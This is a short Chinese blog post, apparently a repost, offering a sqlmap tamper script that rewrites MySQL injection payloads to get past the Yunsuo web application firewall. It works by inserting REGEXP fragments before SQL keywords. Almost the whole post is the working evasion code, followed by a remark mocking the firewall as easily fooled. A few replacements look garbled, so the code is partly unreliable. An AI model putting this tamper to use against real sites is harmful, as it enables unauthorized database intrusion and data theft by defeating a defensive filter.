bypass
作者:互联网
渗透测试确实是一门艺术,需要独特的方法、坚持的决心、长期的经验以及快速学习新技术的能力。非常期待渗透过程中出现的独特挑战,并欣赏该领域的动态特性 。
*- coding: utf-8 -*
import re
import os
from lib.core.data import kb
from lib.core.enums import PRIORITY
from lib.core.common import singleTimeWarnMessage
from lib.core.enums import DBMS
__priority__ = PRIORITY.LOW
def dependencies():
singleTimeWarnMessage("Bypass yunsuo by pureqh'%s' only %s" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL))
def tamper(payload, **kwargs):
payload=payload.replace(" "," ",1)
payload=payload.replace(" AND"," REGEXP \"[...%252523]\" and",1)
payload=re.sub(r'(ORDER BY \d+)', "x", payload)
payload=payload.replace("UNION"," REGEXP \"[...%252523]\" union",1)
payload=payload.replace("(SELECT (CASE WHEN ("," REGEXP \"[...%252523]\" (SELECT (CASE WHEN (",1)
payload=payload.replace(" AS "," REGEXP \"[...%252523]\" as ",1)
payload=payload.replace(" OR "," REGEXP \"[...%252523]\" or ",1)
payload=payload.replace(" WHERE "," REGEXP \"[...%252523]\" where ",1)
payload=payload.replace("HIGH_RISK_OPERATION:0"," REGEXP \"[...%252523]\" ",1)
payload=payload.replace(";","; REGEXP \"[...%252523]\" HTGH",1)
payload=payload.replace("||","; || REGEXP \"[...%252523]\" ",1)
payload=payload.replace("THEN"," THEN REGEXP \"[...%252523]\" ",1)
payload=payload.replace(" IN"," REGEXP \"[...%252523]\" IN ",1)
payload=payload.replace("+"," REGEXP \"[...%252523]\" + ",1)
payload=payload.replace("WHEN"," REGEXP \"[...%252523]\" ",1)
return payload
换个payload就行了,好蠢啊哈哈哈
标签:...%,252523,bypass,import,REGEXP,replace,payload 来源: https://www.cnblogs.com/An-spectator/p/15754871.html